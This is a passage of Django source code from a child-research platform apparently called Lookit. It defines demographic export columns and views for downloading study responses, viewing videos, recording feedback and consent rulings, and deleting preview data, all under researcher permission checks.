description="Response to 'How many children do you have?'; options 0-10 or >10 (More than 10)",
extractor=lambda resp: resp["demographic_snapshot__number_of_children"],
name="Number of children",
),
ResponseDataColumn(
id="demographic__child_rounded_ages",
description=(
"List of rounded ages based on child birthdays entered in demographic form (not based on children "
"registered). Ages are at time of response for this row, in days, rounded to nearest 10 for ages "
"under 1 year and nearest 30 otherwise. In format e.g. [60, 390]"
),
extractor=lambda resp: round_ages_from_birthdays(
resp["demographic_snapshot__child_birthdays"], resp["date_created"]
),
name="Child ages rounded",
),
ResponseDataColumn(
id="demographic__languages_spoken_at_home",
description="Freeform response to 'What language(s) does your family speak at home?'",
extractor=lambda resp: resp["demographic_snapshot__languages_spoken_at_home"],
name="Languages spoken at home",
),
ResponseDataColumn(
id="demographic__number_of_guardians",
description="Response to 'How many parents/guardians do your children live with?' - 1, 2, 3> [3 or more], varies",
extractor=lambda resp: resp["demographic_snapshot__number_of_guardians"],
name="Number of guardians",
),
ResponseDataColumn(
id="demographic__number_of_guardians_explanation",
description=(
"Freeform response to 'If the answer varies due to shared custody arrangements or travel, please "
"enter the number of parents/guardians your children are usually living with or explain.'"
),
extractor=lambda resp: resp[
"demographic_snapshot__number_of_guardians_explanation"
],
name="Number of guardians explanation",
),
ResponseDataColumn(
id="demographic__race_identification",
description=(
"Comma-separated list of all values checked for question 'What category(ies) does your family "
"identify as?', from list: White; Hispanic, Latino, or Spanish origin; Black or African American; "
"Asian; American Indian or Alaska Native; Middle Eastern or North African; Native Hawaiian or "
"Other Pacific Islander; Another race, ethnicity, or origin"
),
extractor=lambda resp: resp["demographic_snapshot__race_identification"],
name="Race",
),
ResponseDataColumn(
id="demographic__parent_age",
description=(
"Parent's response to question 'What is your age?'; options are <18, 18-21, 22-24, 25-29, 30-34, "
"35-39, 40-44, 45-49, 50s, 60s, >70"
),
extractor=lambda resp: resp["demographic_snapshot__age"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__parent_gender",
description=(
"Parent's response to question 'What is your gender?'; options are m [male], f [female], o "
"[other], na [prefer not to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__gender"],
name="Parent age",
),
ResponseDataColumn(
id="demographic__education_level",
description=(
"Parent's response to question 'What is the highest level of education you've completed?'; options "
"are some [some or attending high school], hs [high school diploma or GED], col [some or attending "
"college], assoc [2-year college degree], bach [4-year college degree], grad [some or attending "
"graduate or professional school], prof [graduate or professional degree]"
),
extractor=lambda resp: resp["demographic_snapshot__education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__spouse_education_level",
description=(
"Parent's response to question 'What is the highest level of education your spouse has "
"completed?'; options are some [some or attending high school], hs [high school diploma or GED], "
"col [some or attending college], assoc [2-year college degree], bach [4-year college degree], "
"grad [some or attending graduate or professional school], prof [graduate or professional degree], "
"na [not applicable - no spouse or partner]"
),
extractor=lambda resp: resp["demographic_snapshot__spouse_education_level"],
name="Parent education level",
),
ResponseDataColumn(
id="demographic__annual_income",
description=(
"Parent's response to question 'What is your approximate family yearly income (in US dollars)?'; "
"options are 0, 5000, 10000, 15000, 20000-19000 in increments of 10000, >200000, or na [prefer not "
"to answer]"
),
extractor=lambda resp: resp["demographic_snapshot__annual_income"],
name="Annual income",
),
ResponseDataColumn(
id="demographic__number_of_books",
description="Parent's response to question 'About how many children's books are there in your home?'; integer",
extractor=lambda resp: resp["demographic_snapshot__number_of_books"],
name="Number of books",
),
ResponseDataColumn(
id="demographic__additional_comments",
description="Parent's freeform response to question 'Anything else you'd like us to know?'",
extractor=lambda resp: resp["demographic_snapshot__additional_comments"],
name="Additional comments",
),
ResponseDataColumn(
id="demographic__country",
description="Parent's response to question 'What country do you live in?'; 2-letter country code",
extractor=lambda resp: resp["demographic_snapshot__country"],
name="Country code",
),
ResponseDataColumn(
id="demographic__state",
description=(
"Parent's response to question 'What state do you live in?' if country is US; 2-letter state "
"abbreviation"
),
extractor=lambda resp: resp["demographic_snapshot__state"],
name="US State",
),
ResponseDataColumn(
id="demographic__density",
description=(
"Parent's response to question 'How would you describe the area where you live?'; options are "
"urban, suburban, rural"
),
extractor=lambda resp: resp["demographic_snapshot__density"],
name="Density",
),
ResponseDataColumn(
id="demographic__lookit_referrer",
description="Parent's freeform response to question 'How did you hear about Lookit?'",
extractor=lambda resp: resp["demographic_snapshot__lookit_referrer"],
name="How you heard about Lookit",
),
]
# Which headers from the response data summary should go in the child data downloads
CHILD_CSV_HEADERS = [
    col.id
    for col in RESPONSE_COLUMNS
    if col.id.startswith("child__") or col.id.startswith("participant__")
]

# Response-summary headers flagged as containing identifiable data; used to decide
# whether a download filename gets the "_identifiable" marker.
IDENTIFIABLE_DATA_HEADERS = {col.id for col in RESPONSE_COLUMNS if col.identifiable}
def get_response_headers(
    selected_header_ids: Union[Set, List],
    all_available_header_ids: Union[Set, KeysView],
) -> List:
    """Return the ordered header list for a response data download.

    Standard (non-optional) columns plus any selected optional columns come
    first, in RESPONSE_COLUMNS order. The last two RESPONSE_COLUMNS entries
    (response__sequence and response__conditions) are excluded here because they
    expand into their own per-item headers. Any remaining headers observed in
    the actual data are appended in sorted order.
    """
    # Optional columns the researcher did not ask for
    omitted_optional_ids = {
        column.id
        for column in RESPONSE_COLUMNS
        if column.optional and column.id not in selected_header_ids
    }
    # Standard columns, minus unselected optional ones, in declaration order
    standard_ids = [
        column.id
        for column in RESPONSE_COLUMNS[:-2]
        if column.id not in omitted_optional_ids
    ]
    # Anything present in the data but not already covered, appended sorted
    leftover_ids = (
        set(all_available_header_ids) - set(standard_ids) - omitted_optional_ids
    )
    return standard_ids + sorted(leftover_ids)
def get_demographic_headers(selected_header_ids=None) -> List[str]:
    """Return the ordered demographic column IDs for a download.

    Every non-optional DEMOGRAPHIC_COLUMNS entry is always included; optional
    entries are included only when their ID appears in selected_header_ids.
    """
    chosen = {} if selected_header_ids is None else selected_header_ids
    headers = []
    for column in DEMOGRAPHIC_COLUMNS:
        if not column.optional or column.id in chosen:
            headers.append(column.id)
    return headers
def construct_response_dictionary(
    resp, columns, optional_headers, include_exp_data=True
):
    """Build a nested dictionary of response data for JSON download.

    Column IDs of the form "object__field" become data[object][field]; any other
    ID shape becomes a flat key. Optional columns are included only when their
    ID appears in optional_headers. When include_exp_data is true, the raw
    exp_data from the response is attached under the "exp_data" key.
    """
    selected = optional_headers if optional_headers is not None else {}
    data = {}
    for column in columns:
        # Skip optional columns the caller did not select
        if column.optional and column.id not in selected:
            continue
        value = column.extractor(resp)
        pieces = column.id.split("__")
        if len(pieces) == 2:
            # "object__field" -> nested under the object name
            group, field = pieces
            data.setdefault(group, {})[field] = value
        else:
            # Anything else (no "__", or more than one) stays a flat key
            data[column.id] = value
    if include_exp_data:
        data["exp_data"] = resp.exp_data
    return data
class FrameDataRow(NamedTuple):
    """One row of long-format frame data: a single key/value observation."""

    # Response UUID; matches summary data and video filenames
    response_uuid: str
    # Study-specific hashed child ID (see hash_id)
    child_hashed_id: str
    # Frame that produced this datum, or "global" for response-level events
    frame_id: str
    # Event index within the frame (as a string); "" for non-event data
    event_number: str
    # Label for the datum, e.g. "formData.child_favorite_animal"
    key: str
    # Value associated with the key
    value: str
# Data-dictionary descriptions for the frame data CSV; keys match FrameDataRow fields.
FRAME_DATA_HEADER_DESCRIPTIONS = {
    "response_uuid": "Unique identifier for this response; can be matched to summary data and video filenames",
    "child_hashed_id": (
        "Hashed identifier for the child associated with this response; can be matched to summary data "
        "child_hashed_id. This random ID may be published directly; it is specific to this study. If you "
        "need to match children across multiple studies, use the child_global_id."
    ),
    "frame_id": (
        "Identifier for the particular frame responsible for this data; matches up to an element in the "
        "response_sequence in the summary data file"
    ),
    "event_number": (
        "Index of the event responsible for this data, if this is an event. Indexes start from 0 within each "
        "frame (and within global data) within each response. Blank for non-event data."
    ),
    "key": "Label for a piece of data collected during this frame - for example, 'formData.child_favorite_animal'",
    "value": "Value of the data associated with this key (of the indexed event if applicable) - for example, 'giraffe'",
}
def get_frame_data(resp: Union[Response, Dict]) -> List[FrameDataRow]:
    """Return all frame-level data for one response as a flat list of FrameDataRow.

    Args:
        resp: either a Response instance or a values dict providing the keys used
            below (child__uuid, study__uuid, study__salt, study__hash_digits,
            uuid, exp_data, global_event_timings).

    Returns:
        One FrameDataRow per global event key/value, per frame event key/value,
        and per non-event frame datum. Exit-survey birthdates, frameType markers,
        and empty generatedProperties are omitted.
    """
    # Normalize to the dict form so the rest of the function has a single code
    # path. isinstance (rather than an exact type(...) check) also accepts dict
    # subclasses, which the original comparison would have mis-routed to the
    # attribute-access branch.
    if not isinstance(resp, dict):
        resp = {
            "child__uuid": resp.child.uuid,
            "study__uuid": resp.study.uuid,
            "study__salt": resp.study.salt,
            "study__hash_digits": resp.study.hash_digits,
            "uuid": resp.uuid,
            "exp_data": resp.exp_data,
            "global_event_timings": resp.global_event_timings,
        }
    frame_data_tuples = []
    child_hashed_id = hash_id(
        resp["child__uuid"],
        resp["study__uuid"],
        resp["study__salt"],
        resp["study__hash_digits"],
    )
    # First add all of the global event timings as events with frame_id "global"
    for (iEvent, event) in enumerate(resp["global_event_timings"]):
        for (key, value) in event.items():
            frame_data_tuples.append(
                FrameDataRow(
                    child_hashed_id=child_hashed_id,
                    response_uuid=str(resp["uuid"]),
                    frame_id="global",
                    key=key,
                    event_number=str(iEvent),
                    value=value,
                )
            )
    # Next add all data in exp_data
    event_prefix = "eventTimings."
    for frame_id, frame_data in resp["exp_data"].items():
        for (key, value) in flatten_dict(frame_data).items():
            # Process event data separately and include event_number within frame.
            # Flattened event keys look like "eventTimings.<index>.<field...>".
            if key.startswith(event_prefix):
                key_pieces = key.split(".")
                frame_data_tuples.append(
                    FrameDataRow(
                        child_hashed_id=child_hashed_id,
                        response_uuid=str(resp["uuid"]),
                        frame_id=frame_id,
                        key=".".join(key_pieces[2:]),
                        event_number=str(key_pieces[1]),
                        value=value,
                    )
                )
            # omit frameType values from CSV
            elif key == "frameType":
                continue
            # Omit the DOB from any exit survey
            elif key == "birthDate" and frame_data.get("frameType", None) == "EXIT":
                continue
            # Omit empty generatedProperties values from CSV
            elif key == "generatedProperties" and not value:
                continue
            # For all other data, create a regular entry with frame_id and no event #
            else:
                frame_data_tuples.append(
                    FrameDataRow(
                        child_hashed_id=child_hashed_id,
                        response_uuid=str(resp["uuid"]),
                        frame_id=frame_id,
                        key=key,
                        event_number="",
                        value=value,
                    )
                )
    return frame_data_tuples
def build_framedata_dict_csv(writer, responses):
    """Write a frame-data "data dictionary" CSV describing headers, frames, and keys.

    Paginates through `responses` (to bound memory use), collects the distinct
    frame IDs, per-frame keys, and event keys actually observed, then writes rows
    to `writer` (a csv.DictWriter with columns: column, description,
    possible_frame_id, frame_description, possible_key, key_description).
    Researcher-facing placeholders are emitted where study-specific descriptions
    must be filled in by hand.
    """
    response_paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
    unique_frame_ids = set()
    event_keys = set()
    unique_frame_keys_dict = {}
    # Pass 1: scan every response to accumulate observed frame IDs and keys.
    for page_num in response_paginator.page_range:
        page_of_responses = response_paginator.page(page_num)
        for resp in page_of_responses:
            this_resp_data = get_frame_data(resp)
            # Frame IDs with their leading "<index>-" prefix stripped, so
            # differently-positioned instances of the same frame collapse together.
            these_ids = {
                d.frame_id.partition("-")[2]
                for d in this_resp_data
                if not d.frame_id == "global"
            }
            event_keys = event_keys | {
                d.key for d in this_resp_data if d.event_number != ""
            }
            unique_frame_ids = unique_frame_ids | these_ids
            for frame_id in these_ids:
                # Non-event keys seen for this frame in this response
                these_keys = {
                    d.key
                    for d in this_resp_data
                    if d.frame_id.partition("-")[2] == frame_id and d.event_number == ""
                }
                if frame_id in unique_frame_keys_dict:
                    unique_frame_keys_dict[frame_id] = (
                        unique_frame_keys_dict[frame_id] | these_keys
                    )
                else:
                    unique_frame_keys_dict[frame_id] = these_keys
    # Start with general descriptions of high-level headers (child_id, response_id, etc.)
    writer.writerows(
        [
            {"column": header, "description": description}
            for (header, description) in FRAME_DATA_HEADER_DESCRIPTIONS.items()
        ]
    )
    writer.writerow(
        {
            "possible_frame_id": "global",
            "frame_description": "Data not associated with a particular frame",
        }
    )
    # Add placeholders to describe each frame type
    unique_frame_ids = sorted(list(unique_frame_ids))
    for frame_id in unique_frame_ids:
        writer.writerow(
            {
                "possible_frame_id": "*-" + frame_id,
                "frame_description": "RESEARCHER: INSERT FRAME DESCRIPTION",
            }
        )
        unique_frame_keys = sorted(list(unique_frame_keys_dict[frame_id]))
        for k in unique_frame_keys:
            writer.writerow(
                {
                    "possible_frame_id": "*-" + frame_id,
                    "possible_key": k,
                    "key_description": "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS KEY MEANS IN THIS FRAME",
                }
            )
    # Finally, describe event keys; stock descriptions cover the framework-level ones.
    event_keys = sorted(list(event_keys))
    event_key_stock_descriptions = {
        "eventType": (
            "Descriptor for this event; determines what other data is available. Global event 'exitEarly' records "
            "cases where the participant attempted to exit the study early by closing the tab/window or pressing F1 "
            "or ctrl-X. RESEARCHER: INSERT DESCRIPTIONS OF PARTICULAR EVENTTYPES USED IN YOUR STUDY. (Note: you can "
            "find a list of events recorded by each frame in the frame documentation at "
            "https://lookit.github.io/ember-lookit-frameplayer, under the Events header.)"
        ),
        "exitType": (
            "Used in the global event exitEarly. Only value stored at this point is 'browserNavigationAttempt'"
        ),
        "lastPageSeen": (
            "Used in the global event exitEarly. Index of the frame the participant was on before exit attempt."
        ),
        "pipeId": (
            "Recorded by any event in a video-capture-equipped frame. Internal video ID used by Pipe service; only "
            "useful for troubleshooting in rare cases."
        ),
        "streamTime": (
            "Recorded by any event in a video-capture-equipped frame. Indicates time within webcam "
            "video (videoId) to nearest 0.1 second. If recording has not started yet, may be 0 or null."
        ),
        "timestamp": "Recorded by all events. Timestamp of event in format e.g. 2019-11-07T17:14:43.626Z",
        "videoId": (
            "Recorded by any event in a video-capture-equipped frame. Filename (without .mp4 extension) of video "
            "currently being recorded."
        ),
    }
    for k in event_keys:
        writer.writerow(
            {
                "possible_frame_id": "any (event data)",
                "possible_key": k,
                "key_description": event_key_stock_descriptions.get(
                    k, "RESEARCHER: INSERT DESCRIPTION OF WHAT THIS EVENT KEY MEANS"
                ),
            }
        )
def build_single_response_framedata_csv(response):
    """Return the long-format frame data for one response as a CSV string."""
    output, writer = csv_namedtuple_writer(FrameDataRow)
    writer.writerows(get_frame_data(response))
    return output.getvalue()
class ResponseDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
    """Mixin for response-download views: permission gating (via
    CanViewStudyResponsesMixin) plus a queryset of this study's responses
    visible to the requesting researcher."""

    model = Response
    paginate_by = 10
    ordering = "id"

    def get_queryset(self):
        """Return this study's responses the current researcher may view, ordered."""
        study = self.study
        return study.responses_for_researcher(self.request.user).order_by(
            self.get_ordering()
        )
class DemographicDownloadMixin(CanViewStudyResponsesMixin, MultipleObjectMixin):
    """Mixin for demographic-data downloads: returns responses as values dicts
    carrying the demographic snapshot fields consumed by DEMOGRAPHIC_COLUMNS
    extractors (which index by these exact keys)."""

    model = Response
    paginate_by = 10
    ordering = "id"

    def get_queryset(self):
        """Return researcher-visible responses as dicts of demographic fields."""
        study = self.study
        return (
            study.responses_for_researcher(self.request.user)
            .order_by(self.get_ordering())
            .select_related("child", "child__user", "study", "demographic_snapshot")
            .values(
                "uuid",
                "date_created",
                "child__user__uuid",
                "study__uuid",
                "study__salt",
                "study__hash_digits",
                "demographic_snapshot__uuid",
                "demographic_snapshot__created_at",
                "demographic_snapshot__number_of_children",
                "demographic_snapshot__child_birthdays",
                "demographic_snapshot__languages_spoken_at_home",
                "demographic_snapshot__number_of_guardians",
                "demographic_snapshot__number_of_guardians_explanation",
                "demographic_snapshot__race_identification",
                "demographic_snapshot__age",
                "demographic_snapshot__gender",
                "demographic_snapshot__education_level",
                "demographic_snapshot__spouse_education_level",
                "demographic_snapshot__annual_income",
                "demographic_snapshot__number_of_books",
                "demographic_snapshot__additional_comments",
                "demographic_snapshot__country",
                "demographic_snapshot__state",
                "demographic_snapshot__density",
                "demographic_snapshot__lookit_referrer",
                "demographic_snapshot__extra",
            )
        )
class StudyResponsesList(ResponseDownloadMixin, generic.ListView):
    """Paginated list view of a study's individual responses, with per-response
    summary data, feedback, and video links for the researcher UI."""

    template_name = "studies/study_responses.html"

    def get_ordering(self):
        """Map the UI's ?sort= parameter onto model fields.

        "id" sorts by child id and "status" by the completed flag; note the
        mapping is a substring replace, so "-id" becomes "-child__id" etc.
        """
        orderby = self.request.GET.get("sort", "id")
        return orderby.replace("id", "child__id").replace("status", "completed")

    def get_queryset(self):
        """Prefetch consent rulings and (researcher-annotated) feedback to avoid
        per-response queries when rendering the list."""
        return (
            super()
            .get_queryset()
            .prefetch_related(
                "consent_rulings__arbiter",
                Prefetch(
                    "feedback",
                    queryset=Feedback.objects.select_related("researcher").order_by(
                        "-id"
                    ),
                ),
            )
        )

    def get_context_data(self, **kwargs):
        """Assemble per-response table data, summary panels, video display names,
        data-download options, and the requesting user's permissions."""
        context = super().get_context_data(**kwargs)
        context["study"] = study = self.study
        paginated_responses = context["object_list"]
        columns_included_in_summary = study.columns_included_in_summary()
        # Fixed set of columns shown in the main response table
        columns_included_in_table = [
            "child__hashed_id",
            "response__uuid",
            "response__id",
            "response__status",
            "response__completed",
            "response__is_preview",
        ]
        response_data = []
        for resp in paginated_responses:
            # Info needed for table display of individual responses
            this_resp_data = {
                col.id: col.extractor(resp)
                for col in RESPONSE_COLUMNS
                if col.id in columns_included_in_table
            }
            # Exception - store actual date object for date created
            this_resp_data["response__date_created"] = resp.date_created
            # info needed for summary table shown at right
            this_resp_data["summary"] = [
                {
                    "name": col.name,
                    "value": col.extractor(resp),
                    "description": col.description,
                }
                for col in RESPONSE_COLUMNS
                if col.id in columns_included_in_summary
            ]
            this_resp_data["videos"] = resp.videos.values("pk", "full_name")
            # Shorten video filenames by eliding the study/response UUID segments
            for v in this_resp_data["videos"]:
                v["display_name"] = (
                    v["full_name"]
                    .replace("videoStream_{}_".format(study.uuid), "...")
                    .replace("_{}_".format(resp.uuid), "...")
                )
            response_data.append(this_resp_data)
        context["response_data"] = response_data
        context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
        context["can_view_regular_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
        )
        context["can_view_preview_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
        )
        context["can_edit_feedback"] = self.request.user.has_study_perms(
            StudyPermission.EDIT_STUDY_FEEDBACK, context["study"]
        )
        return context

    def build_video_display_name(self, study_uuid, response_uuid, vid_name):
        """Elide study/response UUID segments from a video filename for display.

        NOTE(review): not referenced within this class — get_context_data builds
        display names inline above. Confirm external/template use before removing.
        """
        return ". . ." + ". . .".join(
            vid_name.split(study_uuid + "_")[1].split("_" + response_uuid + "_")
        )
class StudySingleResponseDownload(ResponseDownloadMixin, View):
    """Serves one response as a downloadable file: JSON, CSV, or frame-data CSV."""

    def get(self, *args, **kwargs):
        """Validate the requested data type and response, then stream the file.

        Raises SuspiciousOperation (-> 400) on an unknown data type or a
        response id outside the viewable queryset.
        """
        data_type = self.request.GET.get("data-type-selector", None)
        if data_type not in ["json", "csv", "framedata"]:
            raise SuspiciousOperation
        response_id = self.request.GET.get("response_id", None)
        try:
            # get_queryset() already restricts to responses this user may see.
            resp = self.get_queryset().get(pk=response_id)
        except ObjectDoesNotExist:
            raise SuspiciousOperation
        study = self.study
        header_options = set(self.request.GET.getlist("data_options"))
        extension = "json" if data_type == "json" else "csv"
        # Suffix: "_frames" for JSON; "_identifiable" when any identifiable
        # header was requested for CSV; empty otherwise.
        filename = "{}_{}{}.{}".format(
            study_name_for_files(study.name),
            str(resp.uuid),
            "_frames"
            if data_type == "json"
            else "_identifiable"
            if IDENTIFIABLE_DATA_HEADERS & header_options
            else "",
            extension,
        )
        if data_type == "json":
            cleaned_data = json.dumps(
                construct_response_dictionary(resp, RESPONSE_COLUMNS, header_options),
                indent="\t",
                default=str,
            )
        elif data_type == "csv":
            row_data = flatten_dict(
                {col.id: col.extractor(resp) for col in RESPONSE_COLUMNS}
            )
            header_list = get_response_headers(header_options, row_data.keys())
            output, writer = csv_dict_output_and_writer(header_list)
            writer.writerow(row_data)
            cleaned_data = output.getvalue()
        elif data_type == "framedata":
            cleaned_data = build_single_response_framedata_csv(resp)
        else:
            # Unreachable given the check above; kept as a defensive guard.
            raise SuspiciousOperation
        response = HttpResponse(cleaned_data, content_type="text/{}".format(extension))
        response["Content-Disposition"] = 'attachment; filename="{}"'.format(filename)
        return response
class StudyResponseVideoAttachment(
    ResearcherLoginRequiredMixin, UserPassesTestMixin, StudyLookupMixin, View
):
    """Streams or redirects to a single consented-response video for a study."""

    raise_exception = True

    @cached_property
    def video(self):
        # Only select the video from consented videos for this study
        return self.study.videos_for_consented_responses.get(
            pk=self.kwargs.get("video")
        )

    def can_view_this_video(self):
        """Permission check: researcher with the response-data perm matching
        whether this video belongs to a preview or a real response."""
        user = self.request.user
        study = self.study
        video = self.video
        return user.is_researcher and (
            (
                user.has_study_perms(StudyPermission.READ_STUDY_RESPONSE_DATA, study)
                and not video.response.is_preview
            )
            or (
                user.has_study_perms(StudyPermission.READ_STUDY_PREVIEW_DATA, study)
                and video.response.is_preview
            )
        )

    test_func = can_view_this_video

    def get(self, request, *args, **kwargs):
        """Redirect to the video URL, or proxy it as an attachment when
        ?mode=download is given (fetches the full file into memory first)."""
        video = self.video
        download_url = video.download_url
        if self.request.GET.get("mode") == "download":
            r = requests.get(download_url)
            response = FileResponse(
                File.open(io.BytesIO(r.content)),
                filename=video.filename,
                as_attachment=True,
            )
            return response
        return redirect(download_url)
class StudyResponseSubmitFeedback(StudyLookupMixin, UserPassesTestMixin, View):
    """Lets a researcher create feedback on a response, or edit existing feedback."""

    def user_can_edit_feedback(self):
        """Permission gate for posting feedback.

        The user must be a researcher holding EDIT_STUDY_FEEDBACK on this
        study, and any feedback_id / response_id referenced in the POST must
        belong to this study.
        """
        user = self.request.user
        study = self.study
        # First check user has permission to be editing feedback from this study at all.
        # BUGFIX: was `not user.is_researcher and user.has_study_perms(...)`,
        # which parses as `(not is_researcher) and has_perms` and therefore
        # never rejected researchers lacking the perm. Require BOTH conditions.
        if not (
            user.is_researcher
            and user.has_study_perms(StudyPermission.EDIT_STUDY_FEEDBACK, study)
        ):
            return False
        # Check that the feedback_id (if given) is from this study
        feedback_id = self.request.POST.get("feedback_id", None)
        if feedback_id:
            try:
                feedback = Feedback.objects.get(id=feedback_id)
            except ObjectDoesNotExist:
                return False
            if feedback.response.study_id != study.pk:
                return False
        # Check that the response_id (if given) is from this study
        response_id = self.request.POST.get("response_id", None)
        if response_id:
            try:
                response = Response.objects.get(id=int(response_id))
            except (ValueError, ObjectDoesNotExist):
                # ValueError: non-numeric id in the POST data; treat as forbidden
                # rather than letting it surface as a 500.
                return False
            if response.study_id != study.pk:
                return False
        return True

    test_func = user_can_edit_feedback

    def post(self, request, *args, **kwargs):
        """Update the comment of an existing Feedback (if feedback_id given),
        otherwise create new Feedback on the given response; then redirect
        back to the study's response list."""
        form_data = self.request.POST
        user = self.request.user
        study = self.study
        feedback_id = form_data.get("feedback_id", None)
        comment = form_data.get("comment", "")
        if feedback_id:
            Feedback.objects.filter(id=feedback_id).update(comment=comment)
        else:
            response_id = int(form_data.get("response_id"))
            Feedback.objects.create(
                response_id=response_id, researcher=user, comment=comment
            )
        return HttpResponseRedirect(
            reverse("exp:study-responses-list", kwargs=dict(pk=study.pk))
        )
class StudyResponsesConsentManager(
    ResearcherLoginRequiredMixin,
    UserPassesTestMixin,
    SingleObjectFetchProtocol[Study],
    generic.DetailView,
):
    """Consent-coding UI: lets an authorized researcher review consent videos
    and record accepted/rejected/pending rulings for each response."""

    template_name = "studies/study_responses_consent_ruling.html"
    queryset = Study.objects.all()
    raise_exception = True

    def user_can_code_consent(self):
        """Researcher with either full or preview-only consent-coding perms."""
        user = self.request.user
        study = self.get_object()
        return user.is_researcher and (
            user.has_study_perms(StudyPermission.CODE_STUDY_CONSENT, study)
            or user.has_study_perms(StudyPermission.CODE_STUDY_PREVIEW_CONSENT, study)
        )

    test_func = user_can_code_consent

    def get_context_data(self, **kwargs):
        """Assemble responses with current rulings/videos, summary stats, and a
        JSON key-value store (keyed by response uuid) consumed by the page JS."""
        context = super().get_context_data(**kwargs)
        # Need to prefetch our responses with consent-footage videos.
        study = context["study"]
        # TODO: technically should not grant access to consent videos for preview data unless has that perm
        # (or should clearly indicate that code_study_consent means preview + actual data)
        preview_only = not self.request.user.has_study_perms(
            StudyPermission.CODE_STUDY_CONSENT, study
        )
        responses = get_responses_with_current_rulings_and_videos(
            study.id, preview_only
        )
        context["loaded_responses"] = responses
        context["summary_statistics"] = get_consent_statistics(study.id, preview_only)
        # Using a map for arbitrarily structured data - lists and objects that we can't just trivially shove onto
        response_key_value_store = {}
        # Page through responses to bound memory while building the store.
        paginator = Paginator(responses, RESPONSE_PAGE_SIZE)
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for response in page_of_responses:
                response_json = response_key_value_store[str(response["uuid"])] = {}
                response["uuid"] = str(response.pop("uuid"))
                response_json["videos"] = response.pop("videos")
                response_json["details"] = {
                    "general": {
                        "uuid": response["uuid"],
                        "global_event_timings": json.dumps(
                            response.pop("global_event_timings")
                        ),
                        "sequence": json.dumps(response.pop("sequence")),
                        "completed": json.dumps(response.pop("completed")),
                        "date_created": str(response["date_created"]),
                    },
                    "participant": {
                        "hashed_id": hash_participant_id(response),
                        "uuid": str(response.pop("child__user__uuid")),
                        "nickname": response.pop("child__user__nickname"),
                    },
                    "child": {
                        "hashed_id": hash_child_id(response),
                        "uuid": str(response.pop("child__uuid")),
                        "name": response.pop("child__given_name"),
                        "birthday": str(response.pop("child__birthday")),
                        "gender": response.pop("child__gender"),
                        "additional_information": response.pop(
                            "child__additional_information"
                        ),
                    },
                }
        # BUGFIX: was `ext[...]`, an undefined name (NameError at runtime);
        # the store belongs on the template context.
        context["response_key_value_store"] = json.dumps(response_key_value_store)
        return context

    def post(self, request, *args, **kwargs):
        """Record consent rulings submitted by the coder.

        Creates a ruling per response listed under each of accepted/rejected/
        pending; any leftover comments (for responses whose ruling did not
        change) are attached to the response's most recent ruling.
        """
        form_data = self.request.POST
        user = self.request.user
        study = self.get_object()
        preview_only = not self.request.user.has_study_perms(
            StudyPermission.CODE_STUDY_CONSENT, study
        )
        responses = study.responses
        if preview_only:
            responses = responses.filter(is_preview=True)
        comments = json.loads(form_data.get("comments"))
        for ruling in ("accepted", "rejected", "pending"):
            judged_responses = responses.filter(uuid__in=form_data.getlist(ruling))
            for response in judged_responses:
                response.consent_rulings.create(
                    action=ruling,
                    arbiter=user,
                    comments=comments.pop(str(response.uuid), None),
                )
                # Save to trigger any post-ruling bookkeeping on the response.
                response.save()
        if comments:
            for resp_uuid, comment in comments.items():
                response = responses.get(uuid=resp_uuid)
                response.consent_rulings.create(
                    action=response.most_recent_ruling, arbiter=user, comments=comment
                )
        return HttpResponseRedirect(
            reverse(
                "exp:study-responses-consent-manager",
                kwargs=dict(pk=self.get_object().pk),
            )
        )

    def get(self, request, *args, **kwargs):
        """External studies collect no consent videos, so there is nothing to code."""
        if self.get_object().study_type.is_external:
            messages.error(request, "There is no consent manager for external studies.")
            return HttpResponseRedirect(reverse("exp:study-detail", kwargs=kwargs))
        else:
            return super().get(request, *args, **kwargs)
class StudyResponsesAll(
    CanViewStudyResponsesMixin, SingleObjectFetchProtocol[Study], generic.DetailView
):
    """Landing page for bulk response downloads; shows counts, download
    options, and the permission flags that gate them."""

    template_name = "studies/study_responses_all.html"
    queryset = Study.objects.all()
    http_method_names = ["get"]

    def get_context_data(self, **kwargs):
        """Add the viewable-response count, optional data columns, and
        per-permission flags used by the template."""
        context = super().get_context_data(**kwargs)
        context["n_responses"] = (
            context["study"].responses_for_researcher(self.request.user).count()
        )
        context["data_options"] = [col for col in RESPONSE_COLUMNS if col.optional]
        context["can_delete_preview_data"] = self.request.user.has_study_perms(
            StudyPermission.DELETE_ALL_PREVIEW_DATA, context["study"]
        )
        context["can_view_regular_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_RESPONSE_DATA, context["study"]
        )
        context["can_view_preview_responses"] = self.request.user.has_study_perms(
            StudyPermission.READ_STUDY_PREVIEW_DATA, context["study"]
        )
        return context
class StudyDeletePreviewResponses(
    ResearcherLoginRequiredMixin,
    UserPassesTestMixin,
    SingleObjectFetchProtocol[Study],
    SingleObjectMixin,
    View,
):
    """POST endpoint that deletes all preview responses (and their related
    videos/logs/rulings/feedback) for a study."""

    queryset = Study.objects.all()

    def user_can_delete_preview_data(self):
        user = self.request.user
        study = self.get_object()
        return user.is_researcher and user.has_study_perms(
            StudyPermission.DELETE_ALL_PREVIEW_DATA, study
        )

    test_func = user_can_delete_preview_data

    def post(self, request, *args, **kwargs):
        """Delete preview responses page by page to bound memory use, then
        redirect back to the responses overview."""
        study = self.get_object()
        preview_responses = study.responses.filter(is_preview=True).prefetch_related(
            "videos", "responselog_set", "consent_rulings", "feedback"
        )
        paginator = Paginator(preview_responses, RESPONSE_PAGE_SIZE)
        for page_num in paginator.page_range:
            page_of_responses = paginator.page(page_num)
            for resp in page_of_responses:
                # Per-instance delete so model delete() hooks (e.g. video
                # cleanup) run, unlike a bulk queryset delete.
                resp.delete()
        return HttpResponseRedirect(
            reverse("exp:study-responses-all", kwargs={"pk": study.id})
        )
class StudyResponsesJSON(ResponseDownloadMixin, generic.list.ListView):
    """Streams all responses for a study as a single JSON array download."""

    # Paginate one response at a time so we never hold all
